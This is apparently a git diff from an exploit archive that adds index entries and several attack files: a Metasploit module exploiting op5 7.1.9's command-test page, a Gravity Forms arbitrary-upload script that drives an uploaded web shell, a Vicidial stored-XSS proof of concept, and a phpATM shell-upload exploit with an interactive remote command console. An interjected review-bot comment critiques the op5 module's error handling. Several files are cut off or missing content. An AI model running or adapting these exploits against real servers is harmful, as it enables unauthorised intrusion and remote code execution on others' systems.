diff --git a/files.csv b/files.csv
index ee150be37..b2c63cd81 100755
--- a/files.csv
+++ b/files.csv
@@ -36151,3 +36151,8 @@ id,file,description,date,author,platform,type,port
 39962,platforms/hardware/webapps/39962.txt,"ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80
 39963,platforms/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80
 39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - CSRF (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80
+39969,platforms/php/webapps/39969.php,"WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80
+39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Stored XSS",2016-06-17,"David Silveiro",php,webapps,80
+39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80
+39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
+39973,platforms/linux/remote/39973.rb,"op5 v7.1.9 Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
diff --git a/platforms/linux/remote/39973.rb b/platforms/linux/remote/39973.rb
new file mode 100755
index 000000000..56f06e860
--- /dev/null
+++ b/platforms/linux/remote/39973.rb
@@ -0,0 +1,132 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ Rank = ExcellentRanking
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'op5 v7.1.9 Configuration Command Execution',
+ 'Description' => %q(
+ op5 an open source network monitoring software.
+ The configuration page in version 7.1.9 and below
+ allows the ability to test a system command, which
+ can be abused to run arbitrary code as an unpriv user.
+ ),
+ 'Author' =>
+ [
+ 'h00die ', # module
+ 'hyp3rlinx' # discovery
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '39676' ],
+ [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['linux', 'unix'],
+ 'Privileged' => false,
+ 'DefaultOptions' => { 'SSL' => true },
+ 'Targets' =>
+ [
+ [ 'Automatic Target', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Apr 08 2016'
+ )
+ )
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),
+ OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),
+ OptString.new('TARGETURI', [ true, 'The path to the application', '/'])
+ ], self.class
+ )
+ end
+
+ def check
+ begin
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path),
+ 'method' => 'GET'
+ )
+ fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+ /Version: (?[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+\|/ =~ res.body
+
+ if version && Gem::Version.new(version) <= Gem::Version.new('7.1.9')
+ vprint_good("Version Detected: #{version}")
+ Exploit::CheckCode::Appears
+ else
+ Exploit::CheckCode::Safe
+ end
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ end
+
+ def exploit
+ execute_cmdstager(
+ :flavor => :echo
+ )
+ end
+
+ def execute_command(cmd, opts)
+ begin
+ # To manually view the vuln page, click Manage > Configure > Commands.
+ # Click the "Test this command" button to display the form we abuse.
+
+ # login
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'monitor/index.php/auth/login'),
+ 'method' => 'POST',
+ 'vars_get' =>
+ {
+ 'uri' => 'tac/index'
+ },
+ 'vars_post' =>
+ {
+ 'csrf_token' => '',
+ 'username' => datastore['USERNAME'],
+ 'password' => datastore['PASSWORD']
+ }
+ )
+
+ fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302
+ cookie = res.get_cookies
+ # exploit
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'monitor/op5/nacoma/command_test.php'),
+ 'method' => 'GET',
+ 'cookie' => cookie,
+ 'vars_get' =>
+ {
+ 'cmd_str' => cmd
+ }
+ )
+
+ # success means we hang our session, and wont get back a response
+ if res
+ fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+ fail_with(Failure::UnexpectedReply, "#{peer} - Credentials need additional privileges") if res.body =~ /Access Denied/
+ end
+
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ end
+
+ def on_new_session(session)
+ super
+ session.shell_command_token('setsid $SHELL')
+ end
+end
\ No newline at end of file
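Review bot: The nil guard at the end of execute_command is dead code: `fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?` sits inside `if res`, so it can never fire, while the earlier `if res.code != 302` on the login response has no nil guard at all and raises NoMethodError instead of the intended fail_with when the target does not answer. Moving that guard to the line before the `res.code` comparison and dropping the copy inside `if res` keeps the same failure message where it is actually needed. The comment above `if res` already explains that a successful request never returns; making the consequence explicit there, e.g. `# nil res here is the expected success case, only a returned page is an error`, would spare the next reader from "fixing" the branch. The check regex near the top of the hunk shows `(?[\d]` with no group name after `(?`, which looks like extraction loss of the capture name that the `version` local on the next line depends on, presumably not the committed text.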
diff --git a/platforms/php/webapps/39969.php b/platforms/php/webapps/39969.php
new file mode 100755
index 000000000..5f6474613
--- /dev/null
+++ b/platforms/php/webapps/39969.php
@@ -0,0 +1,53 @@
+&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+$response = curl_exec($ch);
+curl_close($ch);
+
+if (eregi('ok', $response)) {
+ echo "$separator\nShell at $shell\n$separator\n\n";
+ while ($testCom != 'bubye!') {
+ $user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
+ echo "$user@b0x:~$ ";
+ $handle = fopen("php://stdin", 'r');
+ $testCom = trim(fgets($handle));
+ fclose($handle);
+ $comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
+ echo $comOut;
+ }
+}
+else {
+ die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
+}
+
+function get_string_between($string, $start, $end)
+{
+ # stolen from stackoverflow!
+ $string = " " . $string;
+ $ini = strpos($string, $start);
+ if ($ini == 0)
+ return "";
+ $ini += strlen($start);
+ $len = strpos($string, $end, $ini) - $ini;
+ return substr($string, $ini, $len);
+}
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/39970.txt b/platforms/php/webapps/39970.txt
new file mode 100755
index 000000000..4df2870bf
--- /dev/null
+++ b/platforms/php/webapps/39970.txt
@@ -0,0 +1,63 @@
+# Exploit Title: Vicidial 2.11 Scripts - Authenticated Stored XSS
+# Date: 0 day
+# Exploit Author: David Silveiro
+# Exploit Author Github: github.com/davidsilveiro
+# Vendor Homepage: http://vicidial.org
+# Software Link: https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download
+
+
+Vicidial is a popular opensource software, used throughout many different sectors,
+such as; call centers for inbound & outband calling.
+
+The vulnerablility is triggered when an authenticated with user sufficient permissions,
+creates a script (small text document that the agents use for remembering lines)without
+sufficient sanitization happening within "Script Name" and "Script Text". Due to the nature
+of how widely this script can be set, for example a whole Tele-marketing campaign or specific
+ agent, it could very easily be used to infect other hosts on the Network.
+
+POC:
+
+http://localhost.com/vicidial_demo/admin.php?ADD=1111111
+
+POST Data (script_name & script_text);
+
+ADD=2111111&DB=&script_id=tests&script_name=&script_comments=test&
+active=Y&user_group=---ALL---&selectedField=fullname&script_text=&SUBMIT=SUBMIT
+
+Click 'Preview Script'
+
+
+
+
+
+
+
+
+ Preview Script: 1017
+

+ + + + + + +
+
+ +

+
+ +
+
+
+
+
diff --git a/platforms/php/webapps/39971.php b/platforms/php/webapps/39971.php
new file mode 100755
index 000000000..da727bc42
--- /dev/null
+++ b/platforms/php/webapps/39971.php
@@ -0,0 +1,220 @@
+$v )
+ {
+ $t = explode( ':', $v, 2 );
+ if( isset( $t[1] ) )
+ $head[ trim($t[0]) ] = trim( $t[1] );
+ else
+ {
+ $head[] = $v;
+ if( preg_match( "#HTTP/[0-9\.]+\s+([0-9]+)#",$v, $out ) )
+ $head['reponse_code'] = intval($out[1]);
+ }
+ }
+ return $head;
+}
+
+function getPhpsessid($server,$user,$pass){
+ $url = $server.'/login.php';
+ $data = array('action' => 'userlogin', 'user_name' => $user, 'user_pass' => $pass, 'Submit' => 'Enter');
+
+ $options = array(
+ 'http' => array(
+ 'header' => "Content-type: application/x-www-form-urlencoded\r\n",
+ 'method' => 'POST',
+ 'content' => http_build_query($data)
+ )
+ );
+
+ $result = file_get_contents($url, false, stream_context_create($options));
+ $r_header = parseHeaders($http_response_header);
+
+ if ($result === FALSE) {
+ die("[-] Error during request. Check if your connection is up or if you entered the correct name of the server.");
+ }
+
+ if(!isset($r_header['Location'])){
+ die("[-] You didn't entered a correct pair user/password.");
+ }
+
+ if(strpos($r_header['Server'],'Win') === false){
+ die("[-] The server isn't running on Windows. Can't run the exploit.");
+ }
+
+ $sessid = trim(substr(strstr($r_header['Location'],'PHPSESSID'),10));
+
+ return $sessid;
+
+}
+
+function uploadShell($server,$phpsessid){
+
+ $MULTIPART_BOUNDARY= '--------------------------'.microtime(true);
+ $shellname = "0x".rand()."_gh0st.php "; //notice the space after .php
+
+ $header = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0\r\n";
+ $header .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
+ $header .="Accept-Encoding: gzip, deflate\r\n";
+ $header .= "Cookie: PHPSESSID=$phpsessid\r\n";
+ $header .="Connection: close\r\n";
+ $header .= "Content-Type: multipart/form-data; boundary=$MULTIPART_BOUNDARY";
+
+
+ $content = "--$MULTIPART_BOUNDARY\r\n".
+ "Content-Disposition: form-data; name=\"action\"\r\n\r\n".
+ "upload\r\n";
+
+ $content .= "--$MULTIPART_BOUNDARY\r\n".
+ "Content-Disposition: form-data; name=\"directory\"\r\n\r\n".
+ "\r\n";
+
+ $content .= "--$MULTIPART_BOUNDARY\r\n".
+ "Content-Disposition: form-data; name=\"order\"\r\n\r\n".
+ "nom\r\n";
+
+ $content .= "--$MULTIPART_BOUNDARY\r\n".
+ "Content-Disposition: form-data; name=\"direction\"\r\n\r\n".
+ "0\r\n";
+
+
+ $content .= "--$MULTIPART_BOUNDARY\r\n".
+ "Content-Disposition: form-data; name=\"userfile\"; filename=\"$shellname\"\r\n".
+ "Content-Type: application/octet-stream\r\n\r\n".
+ "\r\n";
+
+ $content .= "--$MULTIPART_BOUNDARY\r\n".
+ "Content-Disposition: form-data; name=\"description\"\r\n\r\n".
+ "\r\n";
+
+ $content .= "--$MULTIPART_BOUNDARY--\r\n";
+
+ $options = array(
+ 'http' => array(
+ 'method' => 'POST',
+ 'header' => $header,
+ 'content' => $content,
+ )
+ );
+
+ $url = $server.'/index.php?';
+
+ $result = file_get_contents($url, false, stream_context_create($options));
+ $r_header = parseHeaders($http_response_header);
+
+ if ($result === FALSE) {
+ die("[-] Error during request. Check if your connection is up or if you entered the correct name of the server.");
+ }
+
+ if(!isset($r_header['reponse_code']) && intval($r_header['reponse_code']) != 200){
+ die("[-] Error during upload.");
+ }
+
+ return $shellname;
+
+}
+
+function runConsole($server,$shellname){
+
+ while(1){
+ echo "Insert cmd ('exit' to quit) > ";
+ $cmd = fgets(STDIN);
+ if(trim($cmd) == 'exit' ) die("[+] bye\n");
+ $query = $server."/files/".trim($shellname)."?cmd=".trim($cmd);
+ $result = file_get_contents($query);
+ echo $result."\n";
+ }
+
+}
+
+
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/39972.txt b/platforms/php/webapps/39972.txt
new file mode 100755
index 000000000..49905ec25
--- /dev/null
+++ b/platforms/php/webapps/39972.txt
@@ -0,0 +1,175 @@
+